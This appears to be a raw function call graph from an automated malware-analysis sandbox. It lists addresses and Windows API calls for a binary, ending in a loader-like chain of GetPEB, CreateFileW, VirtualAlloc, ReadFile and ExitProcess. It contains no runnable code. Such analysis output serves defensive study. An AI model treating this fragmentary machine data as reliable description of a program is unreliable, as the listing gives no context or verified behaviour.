96535->97032 96541 49c237 96542 49c253 96541->96542 96543 49a8c7 22 API calls 96541->96543 96546 4e0976 96542->96546 96551 49c297 messages 96542->96551 96543->96542 96544->96397 96545 4afe0b 22 API calls 96545->96557 97034 49aceb 23 API calls messages 96546->97034 96549 4e09bf 96549->96544 97035 50359c 82 API calls __wsopen_s 96549->97035 96551->96549 97017 49aceb 23 API calls messages 96551->97017 96552 49c335 96552->96549 96553 49c342 96552->96553 97018 49a704 22 API calls messages 96553->97018 96554 49bbe0 40 API calls 96554->96557 96558 49c3ac 96556->96558 97019 4ace17 22 API calls messages 96556->97019 96557->96511 96557->96513 96557->96515 96557->96520 96557->96522 96557->96524 96557->96525 96557->96526 96557->96529 96557->96530 96557->96534 96557->96535 96557->96541 96557->96544 96557->96545 96557->96549 96557->96554 97016 49ad81 22 API calls 96557->97016 97025 4f7099 22 API calls __fread_nolock 96557->97025 97026 515745 54 API calls _wcslen 96557->97026 97027 4aaa42 22 API calls messages 96557->97027 97028 4ff05c 40 API calls 96557->97028 97029 49a993 41 API calls 96557->97029 97030 49aceb 23 API calls messages 96557->97030 96558->96397 96559->96397 96560->96397 96561->96397 96580 49ec76 messages 96562->96580 96563 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96563->96580 96565 49fef7 96570 49a8c7 22 API calls 96565->96570 96579 49ed9d messages 96565->96579 96566 4afddb 22 API calls 96566->96580 96568 4e4600 96574 49a8c7 22 API calls 96568->96574 96568->96579 96569 4e4b0b 97040 50359c 82 API calls __wsopen_s 96569->97040 96570->96579 96573 49a8c7 22 API calls 96573->96580 96574->96579 96576 4b0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96576->96580 96577 49fbe3 96577->96579 96581 4e4bdc 96577->96581 96585 49f3ae messages 96577->96585 96578 49a961 22 API calls 96578->96580 96579->96397 96580->96563 96580->96565 96580->96566 96580->96568 96580->96569 96580->96573 96580->96576 96580->96577 96580->96578 96580->96579 96582 4b00a3 29 API calls pre_c_initialization 96580->96582 96584 4e4beb 96580->96584 96580->96585 97037 4a01e0 235 API calls 2 library calls 96580->97037 97038 4a06a0 41 API calls messages 96580->97038 97041 50359c 82 API calls __wsopen_s 96581->97041 96582->96580 97042 50359c 82 API calls __wsopen_s 96584->97042 96585->96579 97039 50359c 82 API calls __wsopen_s 96585->97039 96586->96397 96587->96409 96588->96409 96589->96409 96590->96420 96591->96421 96592->96434 96593->96434 96594->96427 96595->96437 96596->96434 96597->96434 96598->96434 96599->96434 96600->96434 96601->96434 96703 517f59 96602->96703 96604 5195af 96604->96492 96606 49a961 22 API calls 96605->96606 96607 506f1d 96606->96607 96608 49a961 22 API calls 96607->96608 96609 506f26 96608->96609 96610 506f3a 96609->96610 96990 49b567 39 API calls 96609->96990 96612 497510 53 API calls 96610->96612 96618 506f57 _wcslen 96612->96618 96613 506fbc 96616 497510 53 API calls 96613->96616 96614 5070bf 96615 494ecb 94 API calls 96614->96615 96617 5070d0 96615->96617 96619 506fc8 96616->96619 96621 5070e5 96617->96621 96623 494ecb 94 API calls 96617->96623 96618->96613 96618->96614 96627 5070e9 96618->96627 96620 506fdb 96619->96620 96622 49a8c7 22 API calls 96619->96622 96628 507027 96620->96628 96630 507005 96620->96630 96634 49a8c7 22 API calls 96620->96634 96624 49a961 22 API calls 96621->96624 96621->96627 96622->96620 96623->96621 96625 50711a 96624->96625 96626 49a961 22 API calls 96625->96626 96629 507126 96626->96629 96627->96492 96631 497510 53 API calls 96628->96631 96633 49a961 22 API calls 96629->96633 96635 4933c6 22 API calls 96630->96635 96632 507034 96631->96632 96636 507047 96632->96636 96637 50703d 96632->96637 96638 50712f 96633->96638 96634->96630 96639 50700f 96635->96639 96991 4fe199 GetFileAttributesW 96636->96991 96640 49a8c7 22 API calls 96637->96640 96642 49a961 22 API calls 96638->96642 96643 497510 53 API calls 96639->96643 96640->96636 96645 507138 96642->96645 96646 50701b 96643->96646 96644 507050 96647 507063 96644->96647 96650 494c6d 22 API calls 96644->96650 96648 497510 53 API calls 96645->96648 96649 496350 22 API calls 96646->96649 96652 497510 53 API calls 96647->96652 96657 507069 96647->96657 96651 507145 96648->96651 96649->96628 96650->96647 96836 49525f 96651->96836 96654 5070a0 96652->96654 96992 4fd076 57 API calls 96654->96992 96656 507166 96878 494c6d 96656->96878 96657->96627 96660 5071a9 96661 49a8c7 22 API calls 96660->96661 96663 5071ba 96661->96663 96662 494c6d 22 API calls 96664 507186 96662->96664 96665 496350 22 API calls 96663->96665 96664->96660 96666 496b57 22 API calls 96664->96666 96667 5071c8 96665->96667 96668 50719b 96666->96668 96669 496350 22 API calls 96667->96669 96670 496b57 22 API calls 96668->96670 96671 5071d6 96669->96671 96670->96660 96672 496350 22 API calls 96671->96672 96673 5071e4 96672->96673 96674 497510 53 API calls 96673->96674 96675 5071f0 96674->96675 96881 4fd7bc 96675->96881 96677 507201 96678 4fd4ce 4 API calls 96677->96678 96679 50720b 96678->96679 96680 497510 53 API calls 96679->96680 96684 507239 96679->96684 96681 507229 96680->96681 96935 502947 96681->96935 96683 494f39 68 API calls 96683->96627 96684->96683 96686 517f59 120 API calls 96685->96686 96687 51959b 96686->96687 96687->96492 97002 4fdbbe lstrlenW 96688->97002 96691->96494 96692->96453 96693->96456 96694->96466 96695->96478 96696->96478 96697->96455 96698->96489 96699->96489 96700->96489 96701->96487 96702->96489 96741 497510 96703->96741 96707 51844f 96805 518ee4 60 API calls 96707->96805 96708 517fd5 messages 96708->96604 96711 518049 96711->96708 96713 497510 53 API calls 96711->96713 96728 518281 96711->96728 96796 4f417d 22 API calls __fread_nolock 96711->96796 96797 51851d 42 API calls _strftime 96711->96797 96712 51845e 96714 51828f 96712->96714 96715 51846a 96712->96715 96713->96711 96777 517e86 96714->96777 96715->96708 96720 5182c8 96792 4afc70 96720->96792 96723 518302 96799 4963eb 22 API calls 96723->96799 96724 5182e8 96798 50359c 82 API calls __wsopen_s 96724->96798 96727 5182f3 GetCurrentProcess TerminateProcess 96727->96723 96728->96707 96728->96714 96729 518311 96800 496a50 22 API calls 96729->96800 96731 51832a 96740 518352 96731->96740 96801 4a04f0 22 API calls 96731->96801 96732 5184c5 96732->96708 96737 5184d9 FreeLibrary 96732->96737 96734 518341 96802 518b7b 75 API calls 96734->96802 96737->96708 96740->96732 96803 4a04f0 22 API calls 96740->96803 96804 49aceb 23 API calls messages 96740->96804 96806 518b7b 75 API calls 96740->96806 96742 497522 96741->96742 96743 497525 96741->96743 96742->96708 96764 518cd3 96742->96764 96744 49755b 96743->96744 96745 49752d 96743->96745 96747 4d50f6 96744->96747 96750 49756d 96744->96750 96755 4d500f 96744->96755 96807 4b51c6 26 API calls 96745->96807 96810 4b5183 26 API calls 96747->96810 96748 49753d 96754 4afddb 22 API calls 96748->96754 96808 4afb21 51 API calls 96750->96808 96752 4d510e 96752->96752 96756 497547 96754->96756 96757 4d5088 96755->96757 96759 4afe0b 22 API calls 96755->96759 96758 499cb3 22 API calls 96756->96758 96809 4afb21 51 API calls 96757->96809 96758->96742 96760 4d5058 96759->96760 96761 4afddb 22 API calls 96760->96761 96762 4d507f 96761->96762 96763 499cb3 22 API calls 96762->96763 96763->96757 96765 49aec9 22 API calls 96764->96765 96766 518cee CharLowerBuffW 96765->96766 96811 4f8e54 96766->96811 96770 49a961 22 API calls 96771 518d2a 96770->96771 96818 496d25 96771->96818 96773 518d3e 96774 4993b2 22 API calls 96773->96774 96776 518d48 _wcslen 96774->96776 96775 518e5e _wcslen 96775->96711 96776->96775 96831 51851d 42 API calls _strftime 96776->96831 96778 517ea1 96777->96778 96779 517eec 96777->96779 96780 4afe0b 22 API calls 96778->96780 96783 519096 96779->96783 96781 517ec3 96780->96781 96781->96779 96782 4afddb 22 API calls 96781->96782 96782->96781 96784 5192ab messages 96783->96784 96791 5190ba _strcat _wcslen 96783->96791 96784->96720 96785 49b567 39 API calls 96785->96791 96786 49b6b5 39 API calls 96786->96791 96787 49b38f 39 API calls 96787->96791 96788 497510 53 API calls 96788->96791 96789 4bea0c 21 API calls ___std_exception_copy 96789->96791 96791->96784 96791->96785 96791->96786 96791->96787 96791->96788 96791->96789 96835 4fefae 24 API calls _wcslen 96791->96835 96794 4afc85 96792->96794 96793 4afd1d VirtualAlloc 96795 4afceb 96793->96795 96794->96793 96794->96795 96795->96723 96795->96724 96796->96711 96797->96711 96798->96727 96799->96729 96800->96731 96801->96734 96802->96740 96803->96740 96804->96740 96805->96712 96806->96740 96807->96748 96808->96748 96809->96747 96810->96752 96812 4f8e74 _wcslen 96811->96812 96813 4f8f63 96812->96813 96816 4f8ea9 96812->96816 96817 4f8f68 96812->96817 96813->96770 96813->96776 96816->96813 96832 4ace60 41 API calls 96816->96832 96817->96813 96833 4ace60 41 API calls 96817->96833 96819 496d91 96818->96819 96820 496d34 96818->96820 96821 4993b2 22 API calls 96819->96821 96820->96819 96822 496d3f 96820->96822 96827 496d62 __fread_nolock 96821->96827 96823 4d4c9d 96822->96823 96824 496d5a 96822->96824 96826 4afddb 22 API calls 96823->96826 96834 496f34 22 API calls 96824->96834 96828 4d4ca7 96826->96828 96827->96773 96829 4afe0b 22 API calls 96828->96829 96830 4d4cda 96829->96830 96831->96775 96832->96816 96833->96817 96834->96827 96835->96791 96837 49a961 22 API calls 96836->96837 96838 495275 96837->96838 96839 49a961 22 API calls 96838->96839 96840 49527d 96839->96840 96841 49a961 22 API calls 96840->96841 96842 495285 96841->96842 96843 49a961 22 API calls 96842->96843 96844 49528d 96843->96844 96845 4d3df5 96844->96845 96846 4952c1 96844->96846 96847 49a8c7 22 API calls 96845->96847 96848 496d25 22 API calls 96846->96848 96849 4d3dfe 96847->96849 96850 4952cf 96848->96850 96851 49a6c3 22 API calls 96849->96851 96852 4993b2 22 API calls 96850->96852 96854 495304 96851->96854 96853 4952d9 96852->96853 96853->96854 96855 496d25 22 API calls 96853->96855 96856 495325 96854->96856 96870 495349 96854->96870 96877 4d3e20 96854->96877 96858 4952fa 96855->96858 96860 494c6d 22 API calls 96856->96860 96856->96870 96857 496d25 22 API calls 96862 49535a 96857->96862 96859 4993b2 22 API calls 96858->96859 96859->96854 96867 495332 96860->96867 96861 496b57 22 API calls 96874 4d3ee0 96861->96874 96863 49a8c7 22 API calls 96862->96863 96864 495370 96862->96864 96863->96864 96865 495384 96864->96865 96868 49a8c7 22 API calls 96864->96868 96866 49538f 96865->96866 96871 49a8c7 22 API calls 96865->96871 96872 49a8c7 22 API calls 96866->96872 96875 49539a 96866->96875 96869 496d25 22 API calls 96867->96869 96867->96870 96868->96865 96869->96870 96870->96857 96871->96866 96872->96875 96873 494c6d 22 API calls 96873->96874 96874->96870 96874->96873 96993 4949bd 22 API calls __fread_nolock 96874->96993 96875->96656 96877->96861 96879 49aec9 22 API calls 96878->96879 96880 494c78 96879->96880 96880->96660 96880->96662 96882 4fd7d8 96881->96882 96883 4fd7dd 96882->96883 96884 4fd7f3 96882->96884 96886 49a8c7 22 API calls 96883->96886 96934 4fd7ee 96883->96934 96885 49a961 22 API calls 96884->96885 96887 4fd7fb 96885->96887 96886->96934 96888 49a961 22 API calls 96887->96888 96889 4fd803 96888->96889 96890 49a961 22 API calls 96889->96890 96891 4fd80e 96890->96891 96892 49a961 22 API calls 96891->96892 96893 4fd816 96892->96893 96894 49a961 22 API calls 96893->96894 96895 4fd81e 96894->96895 96896 49a961 22 API calls 96895->96896 96897 4fd826 96896->96897 96898 49a961 22 API calls 96897->96898 96899 4fd82e 96898->96899 96900 49a961 22 API calls 96899->96900 96901 4fd836 96900->96901 96902 49525f 22 API calls 96901->96902 96903 4fd84d 96902->96903 96904 49525f 22 API calls 96903->96904 96905 4fd866 96904->96905 96906 494c6d 22 API calls 96905->96906 96907 4fd872 96906->96907 96908 4fd885 96907->96908 96910 4993b2 22 API calls 96907->96910 96909 494c6d 22 API calls 96908->96909 96911 4fd88e 96909->96911 96910->96908 96912 4fd89e 96911->96912 96913 4993b2 22 API calls 96911->96913 96914 4fd8b0 96912->96914 96915 49a8c7 22 API calls 96912->96915 96913->96912 96916 496350 22 API calls 96914->96916 96915->96914 96917 4fd8bb 96916->96917 96994 4fd978 22 API calls 96917->96994 96919 4fd8ca 96995 4fd978 22 API calls 96919->96995 96921 4fd8dd 96922 494c6d 22 API calls 96921->96922 96923 4fd8e7 96922->96923 96924 4fd8fe 96923->96924 96925 4fd8ec 96923->96925 96927 494c6d 22 API calls 96924->96927 96926 4933c6 22 API calls 96925->96926 96928 4fd8f9 96926->96928 96929 4fd907 96927->96929 96932 496350 22 API calls 96928->96932 96930 4fd925 96929->96930 96931 4933c6 22 API calls 96929->96931 96933 496350 22 API calls 96930->96933 96931->96928 96932->96930 96933->96934 96934->96677 96936 502954 __wsopen_s 96935->96936 96937 4afe0b 22 API calls 96936->96937 96938 502971 96937->96938 96939 495722 22 API calls 96938->96939 96940 50297b 96939->96940 96941 50274e 27 API calls 96940->96941 96942 502986 96941->96942 96943 49511f 64 API calls 96942->96943 96944 50299b 96943->96944 96945 502a6c 96944->96945 96946 5029bf 96944->96946 96947 502e66 75 API calls 96945->96947 96948 502e66 75 API calls 96946->96948 96949 502a38 96947->96949 96950 5029c4 96948->96950 96952 4950f5 40 API calls 96949->96952 96973 502a75 messages 96949->96973 96950->96973 97000 4bd583 26 API calls 96950->97000 96953 502a91 96952->96953 96955 4950f5 40 API calls 96953->96955 96954 5029ed 97001 4bd583 26 API calls 96954->97001 96956 502aa1 96955->96956 96957 4950f5 40 API calls 96956->96957 96959 502abc 96957->96959 96960 4950f5 40 API calls 96959->96960 96961 502acc 96960->96961 96962 4950f5 40 API calls 96961->96962 96963 502ae7 96962->96963 96964 4950f5 40 API calls 96963->96964 96965 502af7 96964->96965 96966 4950f5 40 API calls 96965->96966 96967 502b07 96966->96967 96968 4950f5 40 API calls 96967->96968 96969 502b17 96968->96969 96996 503017 GetTempPathW GetTempFileNameW 96969->96996 96971 502b22 96972 4be5eb 29 API calls 96971->96972 96984 502b33 96972->96984 96973->96684 96974 502bed 96975 4be678 67 API calls 96974->96975 96976 502bf8 96975->96976 96978 502c12 96976->96978 96979 502bfe DeleteFileW 96976->96979 96977 4950f5 40 API calls 96977->96984 96980 502c91 CopyFileW 96978->96980 96986 502c18 96978->96986 96979->96973 96981 502ca7 DeleteFileW 96980->96981 96982 502cb9 DeleteFileW 96980->96982 96981->96973 96997 502fd8 CreateFileW 96982->96997 96984->96973 96984->96974 96984->96977 96985 4bdbb3 65 API calls 96984->96985 96985->96984 96987 5022ce 79 API calls 96986->96987 96988 502c7c 96987->96988 96988->96982 96989 502c80 DeleteFileW 96988->96989 96989->96973 96990->96610 96991->96644 96992->96657 96993->96874 96994->96919 96995->96921 96996->96971 96998 503013 96997->96998 96999 502fff SetFileTime CloseHandle 96997->96999 96998->96973 96999->96998 97000->96954 97001->96949 97003 4fdbdc GetFileAttributesW 97002->97003 97004 4fd4d5 97002->97004 97003->97004 97005 4fdbe8 FindFirstFileW 97003->97005 97004->96492 97005->97004 97006 4fdbf9 FindClose 97005->97006 97006->97004 97008 49ae01 97007->97008 97011 49ae1c messages 97007->97011 97009 49aec9 22 API calls 97008->97009 97010 49ae09 CharUpperBuffW 97009->97010 97010->97011 97011->96503 97013 49acae 97012->97013 97014 49acd1 97013->97014 97036 50359c 82 API calls __wsopen_s 97013->97036 97014->96557 97016->96557 97017->96552 97018->96556 97019->96556 97020->96507 97021->96544 97022->96522 97023->96544 97024->96544 97025->96557 97026->96557 97027->96557 97028->96557 97029->96557 97030->96557 97031->96535 97032->96544 97033->96541 97034->96549 97035->96544 97036->97014 97037->96580 97038->96580 97039->96579 97040->96579 97041->96584 97042->96579 97043 4b03fb 97044 4b0407 CallCatchBlock 97043->97044 97072 4afeb1 97044->97072 97046 4b040e 97047 4b0561 97046->97047 97050 4b0438 97046->97050 97099 4b083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97047->97099 97049 4b0568 97100 4b4e52 28 API calls _abort 97049->97100 97061 4b0477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97050->97061 97083 4c247d 97050->97083 97052 4b056e 97101 4b4e04 28 API calls _abort 97052->97101 97055 4b0576 97057 4b0457 97059 4b04d8 97091 4b0959 97059->97091 97061->97059 97095 4b4e1a 38 API calls 2 library calls 97061->97095 97063 4b04de 97064 4b04f3 97063->97064 97096 4b0992 GetModuleHandleW 97064->97096 97066 4b04fa 97066->97049 97067 4b04fe 97066->97067 97068 4b0507 97067->97068 97097 4b4df5 28 API calls _abort 97067->97097 97098 4b0040 13 API calls 2 library calls 97068->97098 97071 4b050f 97071->97057 97073 4afeba 97072->97073 97102 4b0698 IsProcessorFeaturePresent 97073->97102 97075 4afec6 97103 4b2c94 10 API calls 3 library calls 97075->97103 97077 4afecb 97082 4afecf 97077->97082 97104 4c2317 97077->97104 97080 4afee6 97080->97046 97082->97046 97084 4c2494 97083->97084 97085 4b0a8c CatchGuardHandler 5 API calls 97084->97085 97086 4b0451 97085->97086 97086->97057 97087 4c2421 97086->97087 97089 4c2450 97087->97089 97088 4b0a8c CatchGuardHandler 5 API calls 97090 4c2479 97088->97090 97089->97088 97090->97061 97147 4b2340 97091->97147 97094 4b097f 97094->97063 97095->97059 97096->97066 97097->97068 97098->97071 97099->97049 97100->97052 97101->97055 97102->97075 97103->97077 97108 4cd1f6 97104->97108 97107 4b2cbd 8 API calls 3 library calls 97107->97082 97111 4cd213 97108->97111 97112 4cd20f 97108->97112 97109 4b0a8c CatchGuardHandler 5 API calls 97110 4afed8 97109->97110 97110->97080 97110->97107 97111->97112 97114 4c4bfb 97111->97114 97112->97109 97115 4c4c07 CallCatchBlock 97114->97115 97126 4c2f5e EnterCriticalSection 97115->97126 97117 4c4c0e 97127 4c50af 97117->97127 97119 4c4c1d 97125 4c4c2c 97119->97125 97140 4c4a8f 29 API calls 97119->97140 97122 4c4c27 97141 4c4b45 GetStdHandle GetFileType 97122->97141 97123 4c4c3d __wsopen_s 97123->97111 97142 4c4c48 LeaveCriticalSection _abort 97125->97142 97126->97117 97128 4c50bb CallCatchBlock 97127->97128 97129 4c50df 97128->97129 97130 4c50c8 97128->97130 97143 4c2f5e EnterCriticalSection 97129->97143 97144 4bf2d9 20 API calls _abort 97130->97144 97133 4c50cd 97145 4c27ec 26 API calls pre_c_initialization 97133->97145 97135 4c50d7 __wsopen_s 97135->97119 97136 4c5117 97146 4c513e LeaveCriticalSection _abort 97136->97146 97138 4c50eb 97138->97136 97139 4c5000 __wsopen_s 21 API calls 97138->97139 97139->97138 97140->97122 97141->97125 97142->97123 97143->97138 97144->97133 97145->97135 97146->97135 97148 4b096c GetStartupInfoW 97147->97148 97148->97094 97149 491098 97154 4942de 97149->97154 97153 4910a7 97155 49a961 22 API calls 97154->97155 97156 4942f5 GetVersionExW 97155->97156 97157 496b57 22 API calls 97156->97157 97158 494342 97157->97158 97159 4993b2 22 API calls 97158->97159 97163 494378 97158->97163 97160 49436c 97159->97160 97162 4937a0 22 API calls 97160->97162 97161 49441b GetCurrentProcess IsWow64Process 97164 494437 97161->97164 97162->97163 97163->97161 97169 4d37df 97163->97169 97165 49444f LoadLibraryA 97164->97165 97166 4d3824 GetSystemInfo 97164->97166 97167 49449c GetSystemInfo 97165->97167 97168 494460 GetProcAddress 97165->97168 97171 494476 97167->97171 97168->97167 97170 494470 GetNativeSystemInfo 97168->97170 97170->97171 97172 49447a FreeLibrary 97171->97172 97173 49109d 97171->97173 97172->97173 97174 4b00a3 29 API calls __onexit 97173->97174 97174->97153 97175 49105b 97180 49344d 97175->97180 97177 49106a 97211 4b00a3 29 API calls __onexit 97177->97211 97179 491074 97181 49345d __wsopen_s 97180->97181 97182 49a961 22 API calls 97181->97182 97183 493513 97182->97183 97184 493a5a 24 API calls 97183->97184 97185 49351c 97184->97185 97212 493357 97185->97212 97188 4933c6 22 API calls 97189 493535 97188->97189 97190 49515f 22 API calls 97189->97190 97191 493544 97190->97191 97192 49a961 22 API calls 97191->97192 97193 49354d 97192->97193 97194 49a6c3 22 API calls 97193->97194 97195 493556 RegOpenKeyExW 97194->97195 97196 4d3176 RegQueryValueExW 97195->97196 97200 493578 97195->97200 97197 4d320c RegCloseKey 97196->97197 97198 4d3193 97196->97198 97197->97200 97210 4d321e _wcslen 97197->97210 97199 4afe0b 22 API calls 97198->97199 97201 4d31ac 97199->97201 97200->97177 97203 495722 22 API calls 97201->97203 97202 494c6d 22 API calls 97202->97210 97204 4d31b7 RegQueryValueExW 97203->97204 97205 4d31d4 97204->97205 97207 4d31ee messages 97204->97207 97206 496b57 22 API calls 97205->97206 97206->97207 97207->97197 97208 499cb3 22 API calls 97208->97210 97209 49515f 22 API calls 97209->97210 97210->97200 97210->97202 97210->97208 97210->97209 97211->97179 97213 4d1f50 __wsopen_s 97212->97213 97214 493364 GetFullPathNameW 97213->97214 97215 493386 97214->97215 97216 496b57 22 API calls 97215->97216 97217 4933a4 97216->97217 97217->97188 97218 4c90fa 97219 4c911f 97218->97219 97220 4c9107 97218->97220 97224 4c917a 97219->97224 97232 4c9117 97219->97232 97270 4cfdc4 21 API calls 2 library calls 97219->97270 97268 4bf2d9 20 API calls _abort 97220->97268 97222 4c910c 97269 4c27ec 26 API calls pre_c_initialization 97222->97269 97226 4bd955 __fread_nolock 26 API calls 97224->97226 97227 4c9192 97226->97227 97238 4c8c32 97227->97238 97229 4c9199 97230 4bd955 __fread_nolock 26 API calls 97229->97230 97229->97232 97231 4c91c5 97230->97231 97231->97232 97233 4bd955 __fread_nolock 26 API calls 97231->97233 97234 4c91d3 97233->97234 97234->97232 97235 4bd955 __fread_nolock 26 API calls 97234->97235 97236 4c91e3 97235->97236 97237 4bd955 __fread_nolock 26 API calls 97236->97237 97237->97232 97239 4c8c3e CallCatchBlock 97238->97239 97240 4c8c46 97239->97240 97243 4c8c5e 97239->97243 97272 4bf2c6 20 API calls _abort 97240->97272 97241 4c8d24 97279 4bf2c6 20 API calls _abort 97241->97279 97243->97241 97247 4c8c97 97243->97247 97245 4c8c4b 97273 4bf2d9 20 API calls _abort 97245->97273 97249 4c8cbb 97247->97249 97250 4c8ca6 97247->97250 97248 4c8d29 97280 4bf2d9 20 API calls _abort 97248->97280 97271 4c5147 EnterCriticalSection 97249->97271 97274 4bf2c6 20 API calls _abort 97250->97274 97254 4c8cb3 97281 4c27ec 26 API calls pre_c_initialization 97254->97281 97255 4c8cab 97275 4bf2d9 20 API calls _abort 97255->97275 97256 4c8cc1 97259 4c8cdd 97256->97259 97260 4c8cf2 97256->97260 97257 4c8c53 __wsopen_s 97257->97229 97276 4bf2d9 20 API calls _abort 97259->97276 97262 4c8d45 __fread_nolock 38 API calls 97260->97262 97265 4c8ced 97262->97265 97264 4c8ce2 97277 4bf2c6 20 API calls _abort 97264->97277 97278 4c8d1c LeaveCriticalSection __wsopen_s 97265->97278 97268->97222 97269->97232 97270->97224 97271->97256 97272->97245 97273->97257 97274->97255 97275->97254 97276->97264 97277->97265 97278->97257 97279->97248 97280->97254 97281->97257 97282 49f7bf 97283 49f7d3 97282->97283 97284 49fcb6 97282->97284 97285 49fcc2 97283->97285 97287 4afddb 22 API calls 97283->97287 97319 49aceb 23 API calls messages 97284->97319 97320 49aceb 23 API calls messages 97285->97320 97289 49f7e5 97287->97289 97289->97285 97290 49f83e 97289->97290 97291 49fd3d 97289->97291 97293 4a1310 235 API calls 97290->97293 97309 49ed9d messages 97290->97309 97321 501155 22 API calls 97291->97321 97314 49ec76 messages 97293->97314 97295 49fef7 97300 49a8c7 22 API calls 97295->97300 97295->97309 97296 4afddb 22 API calls 97296->97314 97298 4e4600 97303 49a8c7 22 API calls 97298->97303 97298->97309 97299 4e4b0b 97323 50359c 82 API calls __wsopen_s 97299->97323 97300->97309 97303->97309 97305 49a8c7 22 API calls 97305->97314 97306 4b0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97306->97314 97307 49fbe3 97307->97309 97310 4e4bdc 97307->97310 97316 49f3ae messages 97307->97316 97308 49a961 22 API calls 97308->97314 97324 50359c 82 API calls __wsopen_s 97310->97324 97312 4e4beb 97325 50359c 82 API calls __wsopen_s 97312->97325 97313 4b00a3 29 API calls pre_c_initialization 97313->97314 97314->97295 97314->97296 97314->97298 97314->97299 97314->97305 97314->97306 97314->97307 97314->97308 97314->97309 97314->97312 97314->97313 97315 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97314->97315 97314->97316 97317 4a01e0 235 API calls 2 library calls 97314->97317 97318 4a06a0 41 API calls messages 97314->97318 97315->97314 97316->97309 97322 50359c 82 API calls __wsopen_s 97316->97322 97317->97314 97318->97314 97319->97285 97320->97291 97321->97309 97322->97309 97323->97309 97324->97312 97325->97309 97326 49df10 97329 49b710 97326->97329 97330 49b72b 97329->97330 97331 4e00f8 97330->97331 97332 4e0146 97330->97332 97359 49b750 97330->97359 97335 4e0102 97331->97335 97338 4e010f 97331->97338 97331->97359 97371 5158a2 235 API calls 2 library calls 97332->97371 97369 515d33 235 API calls 97335->97369 97354 49ba20 97338->97354 97370 5161d0 235 API calls 2 library calls 97338->97370 97341 49bbe0 40 API calls 97341->97359 97342 4e03d9 97342->97342 97346 4e0322 97374 515c0c 82 API calls 97346->97374 97350 49ba4e 97354->97350 97375 50359c 82 API calls __wsopen_s 97354->97375 97355 49ec40 235 API calls 97355->97359 97356 4ad336 40 API calls 97356->97359 97357 49a8c7 22 API calls 97357->97359 97359->97341 97359->97346 97359->97350 97359->97354 97359->97355 97359->97356 97359->97357 97360 49a81b 41 API calls 97359->97360 97361 4ad2f0 40 API calls 97359->97361 97362 4aa01b 235 API calls 97359->97362 97363 4b0242 5 API calls __Init_thread_wait 97359->97363 97364 4aedcd 22 API calls 97359->97364 97365 4b00a3 29 API calls __onexit 97359->97365 97366 4b01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97359->97366 97367 4aee53 82 API calls 97359->97367 97368 4ae5ca 235 API calls 97359->97368 97372 49aceb 23 API calls messages 97359->97372 97373 4ef6bf 23 API calls 97359->97373 97360->97359 97361->97359 97362->97359 97363->97359 97364->97359 97365->97359 97366->97359 97367->97359 97368->97359 97369->97338 97370->97354 97371->97359 97372->97359 97373->97359 97374->97354 97375->97342 97376 491033 97381 494c91 97376->97381 97380 491042 97382 49a961 22 API calls 97381->97382 97383 494cff 97382->97383 97389 493af0 97383->97389 97386 494d9c 97387 491038 97386->97387 97392 4951f7 22 API calls __fread_nolock 97386->97392 97388 4b00a3 29 API calls __onexit 97387->97388 97388->97380 97393 493b1c 97389->97393 97392->97386 97394 493b0f 97393->97394 97395 493b29 97393->97395 97394->97386 97395->97394 97396 493b30 RegOpenKeyExW 97395->97396 97396->97394 97397 493b4a RegQueryValueExW 97396->97397 97398 493b6b 97397->97398 97399 493b80 RegCloseKey 97397->97399 97398->97399 97399->97394 97400 4e3f75 97411 4aceb1 97400->97411 97402 4e3f8b 97410 4e4006 97402->97410 97420 4ae300 23 API calls 97402->97420 97404 49bf40 235 API calls 97405 4e4052 97404->97405 97408 4e4a88 97405->97408 97422 50359c 82 API calls __wsopen_s 97405->97422 97407 4e3fe6 97407->97405 97421 501abf 22 API calls 97407->97421 97410->97404 97412 4acebf 97411->97412 97413 4aced2 97411->97413 97423 49aceb 23 API calls messages 97412->97423 97414 4aced7 97413->97414 97415 4acf05 97413->97415 97417 4afddb 22 API calls 97414->97417 97424 49aceb 23 API calls messages 97415->97424 97419 4acec9 97417->97419 97419->97402 97420->97407 97421->97410 97422->97408 97423->97419 97424->97419 97425 36d23b0 97439 36d0000 97425->97439 97427 36d2477 97442 36d22a0 97427->97442 97429 36d24a0 CreateFileW 97431 36d24ef 97429->97431 97432 36d24f4 97429->97432 97432->97431 97433 36d250b VirtualAlloc 97432->97433 97433->97431 97434 36d2529 ReadFile 97433->97434 97434->97431 97435 36d2544 97434->97435 97436 36d12a0 13 API calls 97435->97436 97437 36d2577 97436->97437 97438 36d259a ExitProcess 97437->97438 97438->97431 97445 36d34a0 GetPEB 97439->97445 97441 36d068b 97441->97427 97443 36d22a9 Sleep 97442->97443 97444 36d22b7 97443->97444 97446 36d34ca 97445->97446 97446->97441 97447 492e37 97448 49a961 22 API calls 97447->97448 97449 492e4d 97448->97449 97526 494ae3 97449->97526 97451 492e6b 97452 493a5a 24 API calls 97451->97452 97453 492e7f 97452->97453 97454 499cb3 22 API calls 97453->97454 97455 492e8c 97454->97455 97456 494ecb 94 API calls 97455->97456 97457 492ea5 97456->97457 97458 492ead 97457->97458 97459 4d2cb0 97457->97459 97462 49a8c7 22 API calls 97458->97462 97460 502cf9 80 API calls 97459->97460 97461 4d2cc3 97460->97461 97463 4d2ccf 97461->97463 97465 494f39 68 API calls 97461->97465 97464 492ec3 97462->97464 97468 494f39 68 API calls 97463->97468 97540 496f88 22 API calls 97464->97540 97465->97463 97467 492ecf 97469 499cb3 22 API calls 97467->97469 97470 4d2ce5 97468->97470 97471 492edc 97469->97471 97556 493084 22 API calls 97470->97556 97541 49a81b 41 API calls 97471->97541 97474 492eec 97476 499cb3 22 API calls 97474->97476 97475 4d2d02 97557 493084 22 API calls 97475->97557 97478 492f12 97476->97478 97542 49a81b 41 API calls 97478->97542 97479 4d2d1e 97481 493a5a 24 API calls 97479->97481 97483 4d2d44 97481->97483 97482 492f21 97485 49a961 22 API calls 97482->97485 97558 493084 22 API calls 97483->97558 97487 492f3f 97485->97487 97486 4d2d50 97488 49a8c7 22 API calls 97486->97488 97543 493084 22 API calls 97487->97543 